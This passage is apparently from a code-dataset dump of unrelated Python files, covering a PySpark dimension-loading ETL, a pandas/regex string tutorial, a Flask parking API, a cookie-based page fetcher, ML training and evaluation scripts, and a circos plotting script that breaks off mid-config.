        df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_experience_years", mode="overwrite")
    else:
        # Current dimension contents.
        df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_experience_years")
        # Candidate rows from staging, with the same derived minimum.
        df_dim = df_stg_jobposts.select("experience_years").distinct() \
                    .withColumn("created_date", current_date()) \
                    .withColumn("min_experience_years", regexp_extract("experience_years", "(\\d{1,2})" , 1 ))\
                    .select("min_experience_years", "experience_years", "created_date")
        df_dim = df_dim.withColumn("min_experience_years", df_dim["min_experience_years"].cast(t.IntegerType()))
        # Delta: values not yet in the dimension (left anti-join).
        df_delta_dim = df_dim.join(df_act_dim, [df_dim["min_experience_years"] == df_act_dim["min_experience_years"],
                                   df_dim["experience_years"] == df_act_dim["experience_years"]],"leftanti") \
                    .withColumn("experience_years_key", expr("uuid()")) \
                    .select("experience_years_key", "min_experience_years", "experience_years", "created_date")
        df_new_dim = df_act_dim.union(df_delta_dim)
        # Stage through /tmp, then rewrite presentation (presumably to avoid
        # overwriting the path being read -- confirm).
        df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_experience_years", mode="overwrite")
        spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_experience_years") \
            .repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_experience_years", mode="overwrite")
def load_dim_applicant():
    """
    Load dim_applicant (applicant dimension) into the presentation layer.

    Full load rebuilds the dimension from staging plus a "-1" default
    member; delta load appends only user ids not already present.

    Fixed: the delta branch previously read from the undefined name
    ``df_stg_benefits`` (a copy/paste remnant), which raised a NameError on
    every incremental load; it now uses ``df_stg_applicant``.
    """
    config = configparser.ConfigParser()
    config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
    loadType = config.get('PARAM', 'LOADTYPE')
    spark = create_spark_session()
    # Read source rows from the staging layer.
    df_stg_applicant = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/applications")
    if loadType=="full":
        #DIM APPLICANT
        # Build the dimension: distinct user ids with a uuid key, plus the
        # "-1"/"-1" default member for unknown applicants.
        df_dim = df_stg_applicant.select("user_id").distinct() \
                    .withColumn("applicant_key", expr("uuid()")) \
                    .union(spark.createDataFrame([("-1","-1")],
                            ["user_id", "applicant_key"]))\
                    .withColumn("created_date", current_date()) \
                    .select("applicant_key", "user_id", "created_date")
        df_dim.show(5)
        # Overwrite the presentation-layer dimension.
        df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_applicant", mode="overwrite")
    else:
        # Current dimension contents.
        df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_applicant")
        # Candidate rows from staging (BUGFIX: was df_stg_benefits).
        df_dim = df_stg_applicant.select("user_id").distinct() \
                    .withColumn("created_date", current_date()) \
                    .select("user_id", "created_date")
        # Delta: user ids not yet in the dimension (left anti-join).
        df_delta_dim = df_dim.join(df_act_dim, df_dim["user_id"] == df_act_dim["user_id"],"leftanti") \
                    .withColumn("applicant_key", expr("uuid()")) \
                    .select("applicant_key", "user_id", "created_date")
        df_new_dim = df_act_dim.union(df_delta_dim)
        # Stage through /tmp, then rewrite presentation (presumably to avoid
        # overwriting the path being read -- confirm).
        df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_applicant", mode="overwrite")
        spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_applicant") \
            .repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_applicant", mode="overwrite")
def load_dim_skill():
    """
    Load dim_skill into the presentation layer.

    Reads applicants_skills from staging.  LOADTYPE == "full" rebuilds the
    dimension from scratch; any other value appends only the skill names
    that are not yet present (incremental load).
    """
    config = configparser.ConfigParser()
    config.read('/home/jovyan/work/tfm-jobs-main/parameters.cfg')
    loadType = config.get('PARAM', 'LOADTYPE')
    spark = create_spark_session()
    # Source data from the staging layer
    df_stg_applicant = spark.read.parquet(config['AWS']['S3_BUCKET']+"/staging/applicants_skills")
    if loadType=="full":
        #DIM SKILLS
        # One surrogate key per distinct skill name
        df_dim = df_stg_applicant.select("name").distinct() \
                        .withColumn("skill_key", expr("uuid()")) \
                        .withColumnRenamed("name", "skill_name") \
                        .withColumn("created_date", current_date()) \
                        .select("skill_key", "skill_name", "created_date")
        df_dim.show(5)
        # Full overwrite of the dimension
        df_dim.repartition(2).write.parquet(config['AWS']['S3_BUCKET'] + "/presentation/dim_skill", mode="overwrite")
    else:
        # Current state of the dimension
        df_act_dim = spark.read.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_skill")
        # BUGFIX: this branch referenced the undefined df_stg_benefits
        # (NameError on every incremental run); source is df_stg_applicant.
        df_dim = df_stg_applicant.select("name").distinct() \
                        .withColumnRenamed("name", "skill_name") \
                        .withColumn("created_date", current_date()) \
                        .select("skill_name", "created_date")
        # Incremental rows: staged skills not yet in the dimension
        df_delta_dim = df_dim.join(df_act_dim, df_dim["skill_name"] == df_act_dim["skill_name"],"leftanti") \
                        .withColumn("skill_key", expr("uuid()")) \
                        .select("skill_key", "skill_name", "created_date")
        df_new_dim = df_act_dim.union(df_delta_dim)
        # Stage through /tmp so we never read and overwrite the same path
        df_new_dim.write.parquet(config['AWS']['S3_BUCKET'] + "/tmp/dim_skill", mode="overwrite")
        spark.read.parquet(config['AWS']['S3_BUCKET']+ "/tmp/dim_skill") \
            .repartition(2).write.parquet(config['AWS']['S3_BUCKET']+ "/presentation/dim_skill", mode="overwrite")
|
995,045 | 9a240a177e1fa883d87efebe9b246a9d6d524740 | '''
@author Sam
@date 2017-12-30
@des 第七章数据规整化:清理、转换、合并、重塑
这里主要练习字符串操作
pandas 有对复杂的模式匹配和文本操作的功能进行加强。
'''
import pandas as pd
import numpy as np
import re
val = 'ab, guido'
tmp = val.split(',')
print(val)
pieces = [x.strip() for x in val.split(',')]
print('================>我就是分隔线 1 <==============')
print(pieces)
f, s = pieces
print(f + '::' + s)
print('::'.join(pieces))
print('a' in pieces)
print('================>我就是分隔线 2 <==============')
print(val.index(','))
print(val.find(':'))
print(val.count(','))
print(val.replace(',', '::'))
print('================>我就是分隔线 3 <==============')
val = ' ad bu in morining hello '
val = [x.strip() for x in val.split(' ')]
tmp = [y for y in val if y != '']
print(val)
print(tmp)
print('================>我就是分隔线 3 <==============')
val = 'morning '
print(val.ljust(12, ':'))
print('================>我就是分隔线 4 <==============')
text = "foo bar\t baz \tqux"
print(re.split('\s+', text))
print('================>我就是分隔线 5 <==============')
regex = re.compile('\s+')
print(regex.split(text))
print(regex.findall(text))
print('================>我就是分隔线 5 <==============')
# http://blog.csdn.net/make164492212/article/details/51656638
pattern1 = '[A-Z0-9_-]+@[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+'
regex = re.compile(pattern1, flags=re.IGNORECASE)
text = """Dave Sian@163.com
Samqian163@gmail.com
Rob rob@gmail.com
Ryan ran@yahoo.com"""
print(regex.findall(text))
print('================>我就是分隔线 6 <==============')
m = regex.search(text)
print(m)
print(text[m.start():m.end()])
print('================>我就是分隔线 7 <==============')
print(regex.match(text))
print('================>我就是分隔线 8 <==============')
print(regex.sub('Replaced', text))
print('================>我就是分隔线 9 <==============')
pattern1 = '([A-Z0-9_-]+)@([a-zA-Z0-9_-]+)(\.[a-zA-Z0-9_-]+)'
regex = re.compile(pattern1, flags=re.IGNORECASE)
m = regex.match('wem@awesomel.com')
print(m)
print(m.groups())
print(regex.findall(text))
print('================>我就是分隔线 10 <==============')
pattern1 = '([A-Z0-9 _-]+)@([a-zA-Z0-9_-]+)\.([a-zA-Z0-9_-]+)'
regex = re.compile(pattern1, flags=re.IGNORECASE)
print(regex.sub('Username: \0, Domain: \2, Suffix: \3', text))
print('================>我就是分隔线 11 <==============')
regex = re.compile("""
(?P<Username>[A-Za-z0-9_-]+)
@(?P<Domain>[a-zA-Z0-9_-]+)
\.(?P<suffix>[a-zA-Z0-9_-]+)""", flags=re.IGNORECASE | re.VERBOSE)
tmp = 'samqian163@163.com'
m = regex.match(tmp)
print(m.groupdict())
print('================>我就是分隔线 11 <==============')
data = {'Dave': 'Sian@163.com', 'Sam': 'qian163@gmail.com', 'Rob': 'rob@gmail.com', 'Ryan': 'ran@yahoo.com'}
pattern = '([A-Z0-9 _-]+)@([a-zA-Z0-9_-]+)\.([a-zA-Z0-9_-]+)'
data = pd.Series(data)
print(data)
print('================>我就是分隔线 12 <==============')
print(data.isnull())
print('================>我就是分隔线 13 <==============')
print(data.str.contains('gmail'))
print('================>我就是分隔线 14 <==============')
print(data.str.findall(pattern, flags=re.IGNORECASE))
print('================>我就是分隔线 15 <==============')
matches = data.str.match(pattern, flags=re.IGNORECASE)
print(matches)
print(matches[:2])
|
z=lambda i,j,r:i**2+j**2<r**2
def checkio(R):
    """Return [inside*4, partial*4] for unit cells of one quadrant of a
    circle of radius R: a cell is fully inside when its far corner
    (i+1, j+1) is inside; it is partially covered when only its near
    corner (i, j) is.  Quadrant counts are multiplied by 4 by symmetry."""
    limit = int(R) + 1
    covered = inside = 0
    for col in range(limit):
        for row in range(limit):
            # far-corner-inside implies near-corner-inside, so nesting
            # the two tests is equivalent to counting them independently
            if z(col, row, R):
                covered += 1
                if z(col + 1, row + 1, R):
                    inside += 1
    return [inside * 4, (covered - inside) * 4]
f=lambda R,r,k:sum((i+k)**2+(j+k)**2<R**2 for i in range(r) for j in range(r))
def golf(R):
    """Code-golfed variant of checkio: f(R, r, k) counts grid corners
    offset by k that fall strictly inside the circle; k=1 gives the
    fully-inside cells, k=0 the covered cells."""
    bound = int(R) + 1
    full = f(R, bound, 1)
    return [4 * full, 4 * (f(R, bound, 0) - full)]
if __name__ == '__main__':
    # Smoke tests: expected [fully-inside, partially-covered] cell counts
    # for several radii.
    assert checkio(2) == [4, 12], "N=2"
    assert checkio(3) == [16, 20], "N=3"
    assert checkio(2.1) == [4, 20], "N=2.1"
    assert checkio(2.5) == [12, 20], "N=2.5"
995,047 | 65f4a21ff358c4520f5e8c66ca9446c00fde4e94 | import requests
import sys
import io
from urllib import request
def login():
    """Fetch a login-protected page by replaying a browser session cookie.

    The cookie string is copied verbatim from the browser after a manual
    login and sent as a raw Cookie header together with a desktop Chrome
    User-Agent.  The decoded response body is printed.  Network I/O only;
    returns nothing.
    """
    sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf8') # force UTF-8 on stdout (e.g. Windows consoles)
    # Page that is only reachable after logging in
    url = 'fakeurl'
    # Cookie obtained from the browser after login (the copied string)
    cookie_str = r''
    # Parse the cookie string into a dict for later use
    # NOTE(review): `cookies` is built but never used -- the raw string is
    # what actually gets sent.
    cookies = {}
    for line in cookie_str.split(';'):
        key, value = line.split('=', 1)
        cookies[key] = value
    req = request.Request(url)
    req.add_header("cookie", cookie_str)
    req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36')
    resp = request.urlopen(req)
    print(resp.read().decode("utf-8"))
if __name__ == "__main__":
    login()
995,048 | b09919c93b02099e19c1086fae5729e656e22724 | #!/usr/bin/python
from flask import Flask, jsonify, request
app = Flask(__name__)
# In-memory stores (no database): one seed transaction and one seed place.
# `transactions` grows as /transact requests succeed.
transactions = [
    {
        'transaction_id': 1,
        'place_id': u'place_id',
        'car': 'car',
        'cost' : u'UAH',
        'leave_before' :u'date',
        'hourly_rate': u'rate',
        'result': 'result'
    }
]
# Each place tracks its parked cars as {car_number: leave_before} dicts.
places = [
    {
        'place_id': 1,
        'car': [{'car_number': 'leave_before'}],
        'hourly_rate': '10',
    }
]
@app.route('/todo/api/v1.0/places', methods = ['GET'])
def get_places():
    """Return the place whose place_id matches the request's JSON body.

    BUGFIX: previously the view returned None (an HTTP 500) when no place
    matched, and crashed with AttributeError when the request carried no
    JSON body; both cases now yield an explicit 404 error response.
    """
    payload = request.json or {}
    for place in places:
        if payload.get('place_id', '') == place['place_id']:
            return jsonify( { 'place': place })
    return jsonify({'Error': 'No place with the given place_id.'}), 404
@app.route('/todo/api/v1.0/transact', methods = ['POST'])
def trasaction():
    """Create a parking transaction for an existing place.

    Searches `places` for the requested place_id; on a match a transaction
    is recorded, the car is attached to the place, and the transaction is
    returned with HTTP 201.  Otherwise an error JSON is returned.

    BUGFIX: the success flag was only ever assigned inside the loop body,
    so an empty `places` list raised NameError; it is now initialised
    before the loop.
    """
    found = False
    transaction = None
    for place in places:
        if request.json.get('place_id', '') == place['place_id']:
            transaction = {
                'transaction_id': int(transactions[-1]['transaction_id']) + 1,
                'place_id': request.json.get('place_id', ''),
                'car_number': request.json.get('car', ''),
                'leave_before': request.json.get('leave_before', ''),
                'cost': request.json.get('cost', ''),
                'hourly_rate': request.json.get('hourly_rate'),
                'result': True
            }
            # NOTE(review): the transaction reads the car from key 'car'
            # but the place is updated from key 'car_number' -- confirm
            # which key clients actually send.
            place['car'].append({request.json.get('car_number', ''): request.json.get('leave_before', ''),})
            transactions.append(transaction)
            found = True
            break
    if found:
        return jsonify( { 'transaction': transaction } ), 201
    return jsonify( {'Error': 'Transaction is not successful! There is no such place in db. Try again.'})
if __name__ == '__main__':
    app.run(debug = True)
995,049 | 30f29976f16cf2caaaee895ac0408ad55136c090 | import os
import time
import json
import logging
import argparse
import sys
sys.path.append(os.path.join("libs", "soft"))
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.keras import backend as K
from data import ContentVaeDataGenerator
from data import CollaborativeVAEDataGenerator
from pretrain_vae import get_content_vae
from train_vbae_soft import get_collabo_vae, infer_tstep
from evaluate import EvaluateModel
from evaluate import Recall_at_k, NDCG_at_k
def predict_and_evaluate():
    """Evaluate a trained soft-VBAE recommender on the test split.

    Restores the pretrained content VAE and the collaborative VAE weights
    from `model_root`, infers the t-step user representations, scores the
    b-step test generator with Recall@{20,40} and NDCG@100, and writes the
    metrics as recalls.csv / NDCGs.csv into the model directory.
    """
    ### Parse the console arguments.
    parser = argparse.ArgumentParser()
    parser.add_argument("--dataset", type=str,
        help="specify the dataset for experiment")
    parser.add_argument("--split", type=int,
        help="specify the split of the dataset")
    parser.add_argument("--batch_size", type=int, default=128,
        help="specify the batch size prediction")
    parser.add_argument("--model_root", type=str, default=None,
        help="specify the trained model root (optional)")
    parser.add_argument("--device" , type=str, default="0",
        help="specify the visible GPU device")
    args = parser.parse_args()
    # Restrict TF to the requested GPU before the session is created.
    os.environ["CUDA_VISIBLE_DEVICES"] = args.device
    ### Set up the tensorflow session.
    config = tf.ConfigProto()
    config.gpu_options.allow_growth=True
    sess = tf.Session(config=config)
    K.set_session(sess)
    ### Fix the random seeds.
    np.random.seed(98765)
    tf.set_random_seed(98765)
    ### Get the test data generator for content vae
    data_root = os.path.join("data", args.dataset, str(args.split))
    if args.model_root:
        model_root = args.model_root
    else:
        # Default layout: models/<dataset>/<split>/vbae-soft
        model_root = os.path.join("models", args.dataset, str(args.split), "vbae-soft")
    params_path = os.path.join(model_root, "hyperparams.json")
    with open(params_path, "r") as params_file:
        params = json.load(params_file)
    pretrain_params_path = os.path.join(model_root, "pretrain_hyperparams.json")
    with open(pretrain_params_path, "r") as params_file:
        pretrain_params = json.load(params_file)
    tstep_test_gen = ContentVaeDataGenerator(
        data_root = data_root, phase="test",
        batch_size = 1000, joint=True,
        shuffle=False
    )
    bstep_test_gen = CollaborativeVAEDataGenerator(
        data_root = data_root, phase = "test",
        batch_size = args.batch_size, joint=True,
        shuffle=False
    )
    ### Make sure the data order is aligned between two data generator
    assert np.all(tstep_test_gen.user_ids==bstep_test_gen.user_ids)
    ### Build test model and load trained weights
    collab_vae = get_collabo_vae(params, [None, bstep_test_gen.num_items])
    collab_vae.load_weights(os.path.join(model_root, "best_bstep.model"))
    collab_decoder = collab_vae.build_vbae_recon_bstep()
    content_vae = get_content_vae(pretrain_params, tstep_test_gen.feature_dim)
    content_vae.build_vbae_tstep(collab_decoder, 0).load_weights(os.path.join(model_root, "best_tstep.model"))
    vbae_infer_tstep = content_vae.build_vbae_infer_tstep()
    vbae_eval = collab_vae.build_vbae_eval()
    # Push the content-side (t-step) user features into the collaborative
    # test generator before scoring.  `.A` densifies the sparse features.
    bstep_test_gen.update_previous_tstep(infer_tstep(vbae_infer_tstep, tstep_test_gen.features.A))
    ### Evaluate and save the results
    k4recalls = [20, 40]
    k4ndcgs = [100]
    recalls, NDCGs = [], []
    for k in k4recalls:
        recalls.append("{:.4f}".format(EvaluateModel(vbae_eval, bstep_test_gen, Recall_at_k, k=k)))
    for k in k4ndcgs:
        NDCGs.append("{:.4f}".format(EvaluateModel(vbae_eval, bstep_test_gen, NDCG_at_k, k=k)))
    recall_table = pd.DataFrame({"k":k4recalls, "recalls":recalls}, columns=["k", "recalls"])
    recall_table.to_csv(os.path.join(model_root, "recalls.csv"), index=False)
    ndcg_table = pd.DataFrame({"k":k4ndcgs, "NDCGs": NDCGs}, columns=["k", "NDCGs"])
    ndcg_table.to_csv(os.path.join(model_root, "NDCGs.csv"), index=False)
    print("Done evaluation! Results saved to {}".format(model_root))
if __name__ == '__main__':
    predict_and_evaluate()
995,050 | 1920d963dad15b2d2a2b90416c808236efdf3c89 | import sys
import json
from dateutil.parser import parse
from datetime import datetime
import pandas as pd
from text_util import TextUtil
class BlogEntry(object):
    """Immutable view of a single crawled blog post."""

    def __init__(self, title, date, url, raw_text, source, crawl_url):
        super(BlogEntry, self).__init__()
        self.__title = title
        # Accept a ready-made datetime, otherwise parse the date string.
        self.__date = date if isinstance(date, datetime) else parse(date)
        self.__url = url
        self.__raw_text = raw_text
        self.__source = source
        self.__crawl_url = crawl_url

    def title(self):
        """The post title."""
        return self.__title

    def date(self):
        """Publication timestamp as a datetime."""
        return self.__date

    def url(self):
        """Canonical URL of the post."""
        return self.__url

    def text(self):
        """Raw post body."""
        return self.__raw_text

    def source(self):
        """Identifier of the blog the post came from."""
        return self.__source

    def crawl_url(self):
        """URL the crawler actually fetched."""
        return self.__crawl_url

    @staticmethod
    def from_json_object(json_object):
        """Build a BlogEntry from one crawled JSON record."""
        unpack = TextUtil.unpack_list
        title = unpack(json_object['title'])
        date_string = unpack(json_object['timestamp'])
        raw_text = unpack(json_object['raw_content'])
        url = unpack(json_object['url'])
        # Source and crawl URL are currently hard-wired to the crawl setup.
        source = 'joy_the_baker'
        crawl_url = url
        return BlogEntry(title, date_string, url, raw_text, source, crawl_url)
class BlogEntryCollection(object):
    """Data class modeling a collection of BlogEntry elements.

    NOTE: this module is Python 2 (print statements below).
    """
    def __init__(self, entries):
        super(BlogEntryCollection, self).__init__()
        if not isinstance(entries, list):
            raise ValueError("Entries is not a list")
        self.__entries = entries
    @staticmethod
    def from_json_file(file_path):
        # Load a whole crawl dump from disk and parse it.
        json_object = json.load(open(file_path))
        return BlogEntryCollection.from_json_object(json_object)
    @staticmethod
    def from_json_object(json_collection):
        # Best-effort parse: records that raise IndexError are skipped
        # and reported as errors.
        entries = []
        for json_entry in json_collection:
            try:
                entry = BlogEntry.from_json_object(json_entry)
                entries.append(entry)
            except IndexError:
                print "Failed to create an entry from JSON"
        blog_entry_collection = BlogEntryCollection(entries)
        errors = len(json_collection) - blog_entry_collection.size()
        print "Parsed " + str(blog_entry_collection.size()) + " with " + str(errors) + " errors"
        return blog_entry_collection
    def size(self):
        # Number of successfully parsed entries.
        return len(self.__entries)
    def to_dataframe(self):
        """Flatten the collection into a pandas DataFrame, adding derived
        year/month/week columns from the entry timestamps."""
        data = {}
        data['title'] = list()
        data['timestamp'] = list()
        data['url'] = list()
        data['raw_content'] = list()
        for entry in self:
            data['title'].append(entry.title())
            data['timestamp'].append(entry.date())
            data['url'].append(entry.url())
            data['raw_content'].append(entry.text())
        data = pd.DataFrame.from_dict(data)
        data['year'] = data['timestamp'].dt.year
        data['month'] = data['timestamp'].dt.month
        # NOTE(review): Series.dt.week is removed in modern pandas
        # (dt.isocalendar().week); fine for the py2-era pandas used here.
        data['week'] = data['timestamp'].dt.week
        return data
    def __iter__(self):
        for entry in self.__entries:
            yield entry
# if __name__ == "__main__":
#     collection = BlogEntryCollection.from_json_file(sys.argv[1])
#     print collection.size()
#     #for entry in collection:
#     #    print entry.title()
#     print collection.to_dataframe()
995,051 | ee3bf8b20892a30fc3b93f7ed6b4ba082e9bda11 | __all__ = ['similar', 'distance']
import similar
import distance |
995,052 | 3cbb0c768a87da1d5d232c34f2710fc04d808680 | import numpy as np
import os
from skimage.transform import resize
from skimage.io import imread
IMG_SIZE = (299, 299, 3)
NUM_CLASSES = 50
class BatchIterator:
    """Endless iterator over random training batches.

    Each __next__ draws `batch_size` filenames at random (a fresh
    permutation every step, so the iterator never terminates), loads the
    images from `directory`, resizes them to `resize_shape` and returns
    (images, one_hot_labels), where labels come from the `train_gt`
    mapping of filename -> class index in [0, NUM_CLASSES).
    """
    def __init__(self, filenames, directory, resize_shape, batch_size, train_gt):
        self._filenames = filenames
        self._directory = directory
        self._resize_shape = resize_shape
        self._batch_size = batch_size
        self._train_gt = train_gt
    def _get_image(self, index):
        # Read one image from disk by its position in the filename list.
        return imread(os.path.join(self._directory, self._filenames[index]))
    def __iter__(self):
        return self
    def __next__(self):
        # Random batch of distinct indices; never raises StopIteration.
        random_indexes = np.random.permutation(len(self._filenames))[:self._batch_size]
        batch_filenames = [self._filenames[index] for index in random_indexes]
        # One-hot encode the ground-truth class of every sampled file.
        labels = np.zeros((self._batch_size, NUM_CLASSES))
        labels_indexes = np.array([
            self._train_gt[filename]
            for filename in batch_filenames
        ])
        labels[np.arange(self._batch_size), labels_indexes] = 1
        # 'reflect' padding avoids border artefacts when resizing.
        return np.array([
            resize(self._get_image(index), self._resize_shape, mode='reflect')
            for index in random_indexes
        ]), labels
class VerboseClallback:
    """Minimal Keras-style callback that only reports validation accuracy.

    Every hook of the Keras callback protocol is implemented as a no-op
    except on_epoch_end, which prints a running epoch counter and the
    epoch's val_categorical_accuracy.  (The class name keeps the original
    public spelling.)
    """

    def __init__(self, model, directory):
        self._model = model
        self._directory = directory
        self._counter = 1  # 1-based epoch counter used only for display

    # --- no-op protocol hooks -------------------------------------------
    def set_model(self, model):
        pass

    def set_params(self, params):
        pass

    def on_train_begin(self, logs):
        pass

    def on_train_end(self, logs):
        pass

    def on_epoch_begin(self, epoch, logs):
        pass

    def on_epoch_end(self, epoch, logs):
        # Report validation accuracy and advance the display counter.
        accuracy = logs['val_categorical_accuracy']
        print('{}) val_categorical_accuracy: {}'.format(self._counter, accuracy))
        self._counter += 1

    def on_batch_begin(self, batch, logs):
        pass

    def on_batch_end(self, batch, logs):
        pass
def get_model(file_name='birds_model.hdf5', image_shape=IMG_SIZE, regularization_lambda=1e-3):
    """Create or reload the NUM_CLASSES-way bird classifier.

    If `file_name` does not exist: build an ImageNet-pretrained Xception
    trunk (global-average pooled, frozen) and attach a fresh
    1024-1024-softmax head with L2 regularisation.  Otherwise the saved
    model is loaded as-is and `image_shape`/`regularization_lambda` are
    ignored.
    """
    from keras import regularizers
    from keras.layers import Dense, Dropout
    from keras.models import Model
    new_model = not os.path.exists(file_name)
    if new_model:
        from keras.applications.xception import Xception
        initial_model = Xception(
            include_top=False, weights='imagenet',
            input_shape=image_shape, pooling='avg'
        )
        last = initial_model.output
        nn = Dense(
            1024, activation='elu',
            kernel_regularizer=regularizers.l2(regularization_lambda)
        )(last)
        nn = Dense(
            1024, activation='elu',
            kernel_regularizer=regularizers.l2(regularization_lambda)
        )(nn)
        prediction = Dense(
            NUM_CLASSES, activation='softmax',
            kernel_regularizer=regularizers.l2(regularization_lambda)
        )(nn)
        model = Model(initial_model.input, prediction)
        # Freeze the pretrained trunk; only the new head will train.
        for layer in initial_model.layers:
            layer.trainable = False
    else:
        from keras.models import load_model
        model = load_model(file_name)
    return model
def train_classifier(train_gt, train_img_dir, fast_train, validation=0.3):
    """Train the classifier on the images in `train_img_dir`.

    `train_gt` maps filename -> class index.  With `fast_train` the run is
    shrunk to one epoch of 4 steps (smoke test); otherwise 60 epochs over
    the whole directory.  Returns the fitted Keras model.

    NOTE(review): `validation` and the train_test_split import are unused
    -- no validation split is actually performed.
    """
    from keras.optimizers import Adam
    from sklearn.model_selection import train_test_split
    model = get_model()
    model.compile(
        loss='categorical_crossentropy',
        optimizer=Adam(lr=1e-4, decay=1e-2),
        metrics=['categorical_accuracy']
    )
    image_filenames = os.listdir(train_img_dir)
    batch_size = 4
    epochs = 1 if fast_train else 60
    steps_per_epoch = 4 if fast_train else int(len(image_filenames) / batch_size)
    model.fit_generator(
        BatchIterator(image_filenames, train_img_dir, IMG_SIZE, batch_size, train_gt),
        steps_per_epoch=steps_per_epoch, epochs=epochs
    )
    return model
def classify(model, test_img_dir):
    """Predict a class index for every image in `test_img_dir`.

    Images are resized to IMG_SIZE and scored in mini-batches of 8.
    Returns a dict mapping filename -> argmax class index.
    """
    result = {}
    img_size=IMG_SIZE
    batch_size = 8
    filenames = os.listdir(test_img_dir)
    for begin_index in range(0, len(filenames), batch_size):
        # Slice out the current (possibly short, final) batch of names.
        current_filenames = [
            filenames[index] for index in range(begin_index, min(begin_index + batch_size, len(filenames)))
        ]
        test_images = np.array([
            resize(imread(os.path.join(test_img_dir, filename)), img_size, mode='reflect')
            for filename in current_filenames
        ])
        answers = model.predict(test_images, batch_size=batch_size)
        for filename, answer in zip(current_filenames, answers):
            result[filename] = np.argmax(answer)
    return result
995,053 | 15b22cbe86b4b2397798a968afb7fc3a6082441d | #!/usr/bin/python3
# Author: Joseph Sevigny
# Date: Feb, 28th 2020
# Purpose: automatic construction of circos plot from gff, fasta, and bed file
# tested for circos v 0.69.3
import os
import shutil
import sys
import argparse
from Bio import SeqIO
# Parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
#OPTIONAL ARGUMENTS
parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
# Circos installation stuff
parser.add_argument("--circos_dir", help="path to circos install", type=str, default="/home/genome/joseph7e/bin/circos-0.69-3/")
parser.add_argument("--circos", help="path to circos program", type=str, default="/home/genome/joseph7e/bin/circos-0.69-3/bin/circos")
# Output options
parser.add_argument("-o", "--outdir", help="directory name for output", type=str, default="circos-mitogenome/")
parser.add_argument("--force", help="force delete and rewrite output dir", action="store_true")
# Required positional arguments
parser.add_argument("fasta", help="FASTA file of mitochondrial genome")
parser.add_argument("gff", help="path to standard gff file associated with FASTA")
parser.add_argument("bed", help="""bed graph file, make with this
bedtools genomecov -ibam sorted_mapped.bam -g ../../reference_fastas/MDD02-FG02-Achotines-A1.fasta -bga > coverage_histogram.bedg
grep NODE_6_ coverage_histogram.bedg | sed 's/NODE_6_length_15196_cov_22.680403/MDD02-FG02-Achotines-A1/g' mito_contig_coverage.bedg | sed 's/\t/ /g' > mito_contig_coverage.bedg.fixed
""")
parser.add_argument("bed2", help="another bed graph file, make as above")
args = parser.parse_args()
if os.path.isdir(args.outdir):
if args.force:
print ("deleting old directory and making new one")
shutil.rmtree(args.outdir)
else:
print("Output directory already exists, please remove, use a new name, or force with --force")
sys.exit()
os.mkdir(args.outdir)
# construct circos input files
# construct karotype from fasta and gff
output_karyotype = open(args.outdir + 'karyotype.txt','w')
for seq_record in SeqIO.parse(args.fasta, "fasta"):
length = len(seq_record)
name = seq_record.id.split('_')[0]
name2 = seq_record.id
output_karyotype.writelines("chr - {} 1 0 {} {}\n".format(name, length, name2))
output_genes = open(args.outdir + 'genes_protein.txt', 'w')
output_tRNA = open(args.outdir + 'genes_trna.txt', 'w')
output_rRNA = open(args.outdir + 'genes_rrna.txt', 'w')
output_labels = open(args.outdir + 'gene_labels.txt', 'w')
saved_starts_and_stops = [] # ensure no overlapping bands
for line in open(args.gff):
# the following is based off of mitos2 gff files.
elements = line.rstrip().split('\t')
contig = elements[0].split('_')[0]
type = elements[2]
start = elements[3]
stop = elements[4]
gene = elements[-1].split('=')[-1]
for pairs in saved_starts_and_stops:
if int(start) >= pairs[0] and int(start) <= pairs[1]:
start = str(pairs[1] + 1)
if int(stop) >= pairs[0] and int(stop) <= pairs[1]:
stop = str(pairs[0] - 1)
saved_starts_and_stops.append([int(start), int(stop)])
if type == 'gene':
output_genes.writelines("{} {} {} {}\n".format(contig, start, stop, gene))
elif type == 'tRNA':
output_tRNA.writelines("{} {} {} {}\n".format(contig, start, stop, gene))
elif type == 'rRNA':
output_rRNA.writelines("{} {} {} {}\n".format(contig, start, stop, gene))
output_labels.writelines("{} {} {} {}\n".format(contig, start, stop, gene))
# write circos config file
# The two {} placeholders in the template are filled with the two bedgraph
# paths: inner histogram = args.bed, outer histogram = args.bed2.
output_config = open(args.outdir + 'config.txt', 'w')
output_config.writelines("""
# circos.conf
karyotype = karyotype.txt
<ideogram>
<spacing>
default = 0.005r
</spacing>
radius = 0.9r
thickness = 5p
fill = yes
</ideogram>
<highlights>
# the default value for z-depth and fill_color for all highlights
z = 0
fill_color = green
# the first set will be drawing from 0.6x 1x-25pixels of the ideogram
# radius and will be green (color by default)
<highlight>
file = genes_protein.txt
r0 = .95r
r1 = 1r
fill_color = dblue
stroke_color = black
stroke_thickness = 3p
</highlight>
<highlight>
file = genes_trna.txt
r0 = .95r
r1 = 1r
fill_color = black
stroke_color = black
stroke_thickness = 0.2
</highlight>
<highlight>
file = genes_rrna.txt
r0 = .95r
r1 = 1r
fill_color = red
stroke_color = black
stroke_thickness = 3p
</highlight>
</highlights>
########################################################## gene labels
<plots>
<plot>
type = text
color = black
file = gene_labels.txt
r0 = 1.01r
r1 = 1.01r+200p
link_dims = 0p,0,50p,0p,10p
link_thickness = 2p
link_color = red
label_size = 34p
label_font = condensed
padding = 0p
